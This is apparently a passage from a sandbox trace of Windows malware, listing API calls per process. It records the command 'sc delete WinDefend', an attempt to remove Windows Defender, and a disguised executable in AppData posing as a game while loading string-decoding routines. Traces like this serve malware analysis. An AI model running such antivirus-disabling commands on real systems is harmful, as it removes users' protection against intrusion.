	[0060.381] GetLastError () returned 0xcb
	[0060.383] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0060.383] GetLastError () returned 0xcb
	[0060.383] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0060.384] GetLastError () returned 0xcb
	[0060.384] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
	[0060.384] GetLastError () returned 0xcb
	[0060.384] CloseHandle (hObject=0x77) returned 1
	[0060.384] GetLastError () returned 0xcb
	[0060.388] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0060.388] GetLastError () returned 0xcb
	[0060.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0060.388] GetLastError () returned 0xcb
	[0060.388] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
	[0060.388] GetLastError () returned 0xcb
	[0060.388] CloseHandle (hObject=0x77) returned 1
	[0060.388] GetLastError () returned 0xcb
	[0060.391] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0060.391] GetLastError () returned 0xcb
	[0060.391] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x55fe89c | out: lpMode=0x55fe89c) returned 1
	[0060.391] GetLastError () returned 0xcb
	[0060.391] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x1f19938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x55fe89c, lpReserved=0x0 | out: lpBuffer=0x1f19938*, lpNumberOfCharsWritten=0x55fe89c*=0x1) returned 1
	[0060.391] GetLastError () returned 0xcb
	[0060.391] CloseHandle (hObject=0x77) returned 1
	[0060.391] GetLastError () returned 0xcb
	[0060.394] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0060.435] GetLastError () returned 0xcb
	[0060.435] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x55fe868 | out: lpConsoleScreenBufferInfo=0x55fe868) returned 1
	[0060.435] GetLastError () returned 0xcb
	[0060.435] GetConsoleOutputCP () returned 0x1b5
	[0060.435] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0060.435] GetLastError () returned 0xcb
	[0060.439] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b
	[0060.439] GetLastError () returned 0xcb
	[0060.439] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0060.439] GetLastError () returned 0xcb
	[0060.442] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f
	[0060.442] GetLastError () returned 0xcb
	[0060.442] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0060.442] GetLastError () returned 0xcb
	[0060.445] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0060.445] GetLastError () returned 0xcb
	[0060.445] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0060.445] GetLastError () returned 0xcb
	[0060.445] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
	[0060.445] GetLastError () returned 0xcb
	[0060.445] CloseHandle (hObject=0x83) returned 1
	[0060.445] GetLastError () returned 0xcb
	[0060.448] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0060.448] GetLastError () returned 0xcb
	[0060.448] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0060.448] GetLastError () returned 0xcb
	[0060.448] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
	[0060.448] GetLastError () returned 0xcb
	[0060.448] CloseHandle (hObject=0x83) returned 1
	[0060.449] GetLastError () returned 0xcb
	[0060.452] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0060.453] GetLastError () returned 0xcb
	[0060.453] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x55fe85c | out: lpMode=0x55fe85c) returned 1
	[0060.453] GetLastError () returned 0xcb
	[0060.453] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x21ce69c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x55fe85c, lpReserved=0x0 | out: lpBuffer=0x21ce69c*, lpNumberOfCharsWritten=0x55fe85c*=0x1) returned 1
	[0060.453] GetLastError () returned 0xcb
	[0060.453] CloseHandle (hObject=0x83) returned 1
	[0060.453] GetLastError () returned 0xcb
	[0060.459] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0060.460] GetLastError () returned 0xcb
	[0060.460] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0060.460] GetLastError () returned 0xcb
	[0060.460] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
	[0060.460] GetLastError () returned 0xcb
	[0060.460] CloseHandle (hObject=0x83) returned 1
	[0060.460] GetLastError () returned 0xcb
	[0060.465] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0060.465] GetLastError () returned 0xcb
	[0060.465] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0060.465] GetLastError () returned 0xcb
	[0060.465] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
	[0060.466] GetLastError () returned 0xcb
	[0060.466] CloseHandle (hObject=0x83) returned 1
	[0060.466] GetLastError () returned 0xcb
	[0060.482] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0060.529] GetLastError () returned 0xcb
	[0060.529] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x55fe89c | out: lpMode=0x55fe89c) returned 1
	[0060.529] GetLastError () returned 0xcb
	[0060.529] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x1f19938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x55fe89c, lpReserved=0x0 | out: lpBuffer=0x1f19938*, lpNumberOfCharsWritten=0x55fe89c*=0x1) returned 1
	[0060.530] GetLastError () returned 0xcb
	[0060.530] CloseHandle (hObject=0x83) returned 1
	[0060.530] GetLastError () returned 0xcb
	[0060.538] SetEvent (hEvent=0x340) returned 1
	[0060.538] GetLastError () returned 0xcb
	[0060.538] SetEvent (hEvent=0x334) returned 1
	[0060.538] GetLastError () returned 0xcb
	[0060.538] SetEvent (hEvent=0x338) returned 1
	[0060.538] GetLastError () returned 0xcb
	[0060.538] SetEvent (hEvent=0x33c) returned 1
	[0060.538] GetLastError () returned 0xcb
	[0060.538] SetEvent (hEvent=0x354) returned 1
	[0060.538] GetLastError () returned 0xcb
	[0060.539] SetEvent (hEvent=0x394) returned 1
	[0060.539] GetLastError () returned 0xcb
	[0060.539] SetEvent (hEvent=0x398) returned 1
	[0060.539] GetLastError () returned 0xcb
	[0060.539] SetEvent (hEvent=0x350) returned 1
	[0060.539] GetLastError () returned 0xcb
	[0060.539] SetEvent (hEvent=0x358) returned 1
	[0060.539] GetLastError () returned 0xcb
	[0060.539] CoUninitialize () 

Thread:
	id = 68
	os_tid = 0x834

	[0060.670] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0060.712] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0060.748] VirtualQuery (in: lpAddress=0x633dfa0, lpBuffer=0x633efa0, dwLength=0x1c | out: lpBuffer=0x633efa0*(BaseAddress=0x633d000, AllocationBase=0x59b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0060.748] VirtualQuery (in: lpAddress=0x633e0bc, lpBuffer=0x633f0bc, dwLength=0x1c | out: lpBuffer=0x633f0bc*(BaseAddress=0x633e000, AllocationBase=0x59b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0060.750] SetEvent (hEvent=0x3a8) returned 1
	[0060.750] GetLastError () returned 0x0
	[0060.750] SetEvent (hEvent=0x3ac) returned 1
	[0060.750] GetLastError () returned 0x0
	[0060.750] SetEvent (hEvent=0x3b4) returned 1
	[0060.750] GetLastError () returned 0x0
	[0060.750] SetEvent (hEvent=0x3a8) returned 1
	[0060.750] GetLastError () returned 0x0
	[0060.750] SetEvent (hEvent=0x3ac) returned 1
	[0060.750] GetLastError () returned 0x0
	[0060.750] SetEvent (hEvent=0x3c4) returned 1
	[0060.750] GetLastError () returned 0x0
	[0060.750] SetEvent (hEvent=0x3b8) returned 1
	[0060.750] GetLastError () returned 0x0
	[0060.750] SetEvent (hEvent=0x3bc) returned 1
	[0060.750] GetLastError () returned 0x0
	[0060.750] SetEvent (hEvent=0x3c0) returned 1
	[0060.750] GetLastError () returned 0x0
	[0060.750] SetEvent (hEvent=0x3c8) returned 1
	[0060.760] GetLastError () returned 0x0
	[0060.768] CoUninitialize () 

Process:
	id = "13"
	image_name = "sc.exe"
	filename = "c:\\windows\\system32\\sc.exe"
	page_root = "0x7ee17680"
	os_pid = "0xf14"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "10"
	os_parent_pid = "0xedc"
	cmd_line = "sc  delete WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 30
	os_tid = 0xf18

	[0046.820] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f8d8 | out: lpSystemTimeAsFileTime=0x14f8d8*(dwLowDateTime=0x7c1d3e0, dwHighDateTime=0x1d50a6a)) 
	[0046.820] GetCurrentProcessId () returned 0xf14
	[0046.820] GetCurrentThreadId () returned 0xf18
	[0046.820] GetTickCount () returned 0xa648c5
	[0046.820] QueryPerformanceCounter (in: lpPerformanceCount=0x14f8d0 | out: lpPerformanceCount=0x14f8d0*=12065838177) returned 1
	[0046.821] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000
	[0046.821] __set_app_type (_Type=0x1) 
	[0046.821] __p__fmode () returned 0x770231f4
	[0046.821] __p__commode () returned 0x770231fc
	[0046.821] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd079c7) returned 0x0
	[0046.821] __wgetmainargs (in: _Argc=0xd09020, _Argv=0xd09028, _Env=0xd09024, _DoWildCard=0, _StartInfo=0xd09034 | out: _Argc=0xd09020, _Argv=0xd09028, _Env=0xd09024) returned 0
	[0046.821] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0046.823] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0046.823] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0046.823] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8
	[0046.823] _wcsicmp (_String1="delete", _String2="query") returned -13
	[0046.823] _wcsicmp (_String1="delete", _String2="queryex") returned -13
	[0046.823] _wcsicmp (_String1="delete", _String2="start") returned -15
	[0046.823] _wcsicmp (_String1="delete", _String2="pause") returned -12
	[0046.823] _wcsicmp (_String1="delete", _String2="interrogate") returned -5
	[0046.823] _wcsicmp (_String1="delete", _String2="control") returned 1
	[0046.823] _wcsicmp (_String1="delete", _String2="continue") returned 1
	[0046.823] _wcsicmp (_String1="delete", _String2="stop") returned -15
	[0046.823] _wcsicmp (_String1="delete", _String2="config") returned 1
	[0046.823] _wcsicmp (_String1="delete", _String2="description") returned -7
	[0046.823] _wcsicmp (_String1="delete", _String2="failure") returned -2
	[0046.823] _wcsicmp (_String1="delete", _String2="privs") returned -12
	[0046.823] _wcsicmp (_String1="delete", _String2="failureflag") returned -2
	[0046.823] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16
	[0046.823] _wcsicmp (_String1="delete", _String2="sidtype") returned -15
	[0046.823] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12
	[0046.823] _wcsicmp (_String1="delete", _String2="qc") returned -13
	[0046.823] _wcsicmp (_String1="delete", _String2="qdescription") returned -13
	[0046.823] _wcsicmp (_String1="delete", _String2="qfailure") returned -13
	[0046.823] _wcsicmp (_String1="delete", _String2="qprivs") returned -13
	[0046.823] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13
	[0046.823] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13
	[0046.823] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13
	[0046.823] _wcsicmp (_String1="delete", _String2="showsid") returned -15
	[0046.823] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13
	[0046.823] _wcsicmp (_String1="delete", _String2="querylock") returned -13
	[0046.823] _wcsicmp (_String1="delete", _String2="lock") returned -8
	[0046.823] _wcsicmp (_String1="delete", _String2="delete") returned 0
	[0046.824] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x27f100
	[0046.826] OpenServiceW (hSCManager=0x27f100, lpServiceName="WinDefend", dwDesiredAccess=0x10000) returned 0x0
	[0046.826] GetLastError () returned 0x5
	[0046.826] _itow (in: _Dest=0x5, _Radix=1374184 | out: _Dest=0x5) returned="5"
	[0046.826] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0xd09380, nSize=0x400, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13
	[0046.827] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x14f7d0, nSize=0x2, Arguments=0x14f7dc | out: lpBuffer="ସ(༄%\x03") returned 0x33
	[0046.828] GetFileType (hFile=0x7) returned 0x2
	[0046.828] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f7a4 | out: lpMode=0x14f7a4) returned 1
	[0046.828] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x280b38*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x14f7c0, lpReserved=0x0 | out: lpBuffer=0x280b38*, lpNumberOfCharsWritten=0x14f7c0*=0x33) returned 1
	[0046.828] LocalFree (hMem=0x280b38) returned 0x0
	[0046.828] LocalFree (hMem=0x0) returned 0x0
	[0046.828] CloseServiceHandle (hSCObject=0x27f100) returned 1
	[0046.830] exit (_Code=5) 

Thread:
	id = 31
	os_tid = 0xf1c


Process:
	id = "14"
	image_name = "dllhost.exe"
	filename = "c:\\windows\\system32\\dllhost.exe"
	page_root = "0x7ee173e0"
	os_pid = "0xf84"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "1"
	os_parent_pid = "0xd50"
	cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 38
	os_tid = 0xfa0


Thread:
	id = 39
	os_tid = 0xf9c


Thread:
	id = 40
	os_tid = 0xf98


Thread:
	id = 41
	os_tid = 0xf94


Thread:
	id = 42
	os_tid = 0xf90


Thread:
	id = 43
	os_tid = 0xf8c


Thread:
	id = 44
	os_tid = 0xf88


Thread:
	id = 45
	os_tid = 0xfa4


Thread:
	id = 46
	os_tid = 0xfa8


Process:
	id = "15"
	image_name = "tadiapce.exe"
	filename = "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe"
	page_root = "0x7ee17460"
	os_pid = "0xfac"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "14"
	os_parent_pid = "0xf84"
	cmd_line = "\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 47
	os_tid = 0xfb0

	[0054.122] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0054.123] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0054.124] GetEnvironmentStrings () returned 0x15fa08*
	[0054.124] GetCommandLineA () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0054.125] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0054.125] GetProcAddress (hModule=0x400000, lpProcName="___CPPdebugHook") returned 0x40e13c
	[0054.125] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0054.125] GetProcAddress (hModule=0x400000, lpProcName="___CPPdebugHook") returned 0x40e13c
	[0054.125] GetACP () returned 0x4e4
	[0054.125] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12ff14 | out: lpCPInfo=0x12ff14) returned 1
	[0054.125] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76b10000
	[0054.125] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0054.125] GetProcAddress (hModule=0x76b10000, lpProcName="Borland32") returned 0x0
	[0054.125] GetVersionExA (in: lpVersionInformation=0x12fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x12fde8, dwMinorVersion=0x0, dwBuildNumber=0x12ff78, dwPlatformId=0x7734e0ed, szCSDVersion="\xb7\x04\xde") | out: lpVersionInformation=0x12fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0054.126] GlobalMemoryStatus (in: lpBuffer=0x12feb4 | out: lpBuffer=0x12feb4) 
	[0054.126] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x1) returned 0x1270000
	[0054.126] VirtualAlloc (lpAddress=0x1270000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1270000
	[0054.127] VirtualAlloc (lpAddress=0x1271000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1271000
	[0054.127] VirtualAlloc (lpAddress=0x1272000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1272000
	[0054.127] VirtualAlloc (lpAddress=0x1273000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1273000
	[0054.127] VirtualAlloc (lpAddress=0x1274000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1274000
	[0054.127] VirtualAlloc (lpAddress=0x1275000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1275000
	[0054.127] VirtualAlloc (lpAddress=0x1276000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1276000
	[0054.127] VirtualAlloc (lpAddress=0x1277000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1277000
	[0054.127] VirtualAlloc (lpAddress=0x1278000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1278000
	[0054.127] VirtualAlloc (lpAddress=0x1279000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1279000
	[0054.128] VirtualAlloc (lpAddress=0x127a000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x127a000
	[0054.128] VirtualAlloc (lpAddress=0x127b000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x127b000
	[0054.128] VirtualAlloc (lpAddress=0x127c000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x127c000
	[0054.128] VirtualAlloc (lpAddress=0x127d000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x127d000
	[0054.128] VirtualAlloc (lpAddress=0x127e000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x127e000
	[0054.128] VirtualAlloc (lpAddress=0x127f000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x127f000
	[0054.128] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12720a0, nSize=0xff | out: lpFilename="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe")) returned 0x3d
	[0054.129] SetHandleCount (uNumber=0x32) returned 0x32
	[0054.129] GetStartupInfoA (in: lpStartupInfo=0x12fee4 | out: lpStartupInfo=0x12fee4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) 
	[0054.129] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0054.129] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0054.129] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0054.129] GetFileType (hFile=0x0) returned 0x0
	[0054.129] GetFileType (hFile=0x0) returned 0x0
	[0054.129] GetFileType (hFile=0x0) returned 0x0
	[0054.129] GetStartupInfoA (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) 
	[0054.129] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0054.129] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
	[0054.129] LoadIconA (hInstance=0x400000, lpIconName=0x71) returned 0x0
	[0054.130] RegisterClassA (lpWndClass=0x12fe9c) returned 0xc07a
	[0054.130] DialogBoxParamA (hInstance=0x400000, lpTemplateName=0x72, hWndParent=0x0, lpDialogFunc=0x40308c, dwInitParam=0x0) returned 0xffffffff
	[0054.130] AdjustWindowRect (in: lpRect=0x12fe70, dwStyle=0xa0000, bMenu=0 | out: lpRect=0x12fe70) returned 1
	[0054.220] CreateWindowExA (dwExStyle=0x0, lpClassName="Squirrel Shootout by Brenton Andrew Saunders", lpWindowName="Squirrel Shootout by Brenton Andrew Saunders", dwStyle=0xa0000, X=-2147483648, Y=-2147483648, nWidth=576, nHeight=576, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30278
	[0054.220] DefWindowProcA (hWnd=0x30278, Msg=0x24, wParam=0x0, lParam=0x12fa40) returned 0x0
	[0054.220] DefWindowProcA (hWnd=0x30278, Msg=0x81, wParam=0x0, lParam=0x12fa04) returned 0x1
	[0054.222] DefWindowProcA (hWnd=0x30278, Msg=0x83, wParam=0x0, lParam=0x12fa60) returned 0x0
	[0054.225] timeGetTime () returned 0xa661d0
	[0054.225] GetClientRect (in: hWnd=0x30278, lpRect=0x43d8d0 | out: lpRect=0x43d8d0) returned 1
	[0054.225] GetDC (hWnd=0x30278) returned 0x14010917
	[0054.225] CreateCompatibleDC (hdc=0x0) returned 0x24010a07
	[0054.226] CreateCompatibleDC (hdc=0x14010917) returned 0x2010a11
	[0054.226] CreateCompatibleBitmap (hdc=0x14010917, cx=570, cy=548) returned 0x1050a12
	[0054.232] LoadBitmapA (hInstance=0x400000, lpBitmapName=0x6f) returned 0x0
	[0054.233] CreateFontA (cHeight=48, cWidth=0, cEscapement=0, cOrientation=0, cWeight=600, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x2, iClipPrecision=0x1, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Comic Sans MS") returned 0x10a0a13
	[0054.233] SelectObject (hdc=0x2010a11, h=0x10a0a13) returned 0x18a002e
	[0054.233] SetTextColor (hdc=0x2010a11, color=0xff0000) returned 0x0
	[0054.233] SetBkMode (hdc=0x2010a11, mode=1) returned 2
	[0054.233] SelectObject (hdc=0x2010a11, h=0x1050a12) returned 0x185000f
	[0054.233] GetStockObject (i=0) returned 0x1900010
	[0054.233] FillRect (hDC=0x14010917, lprc=0x43d8d0, hbr=0x1900010) returned 1
	[0054.233] GetKeyState (nVirtKey=144) returned 1
	[0054.233] SetTimer (hWnd=0x30278, nIDEvent=0x1, uElapse=0x1, lpTimerFunc=0x0) returned 0x1
	[0054.233] SetTimer (hWnd=0x30278, nIDEvent=0x2, uElapse=0x32, lpTimerFunc=0x0) returned 0x2
	[0054.234] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0054.234] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0054.238] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
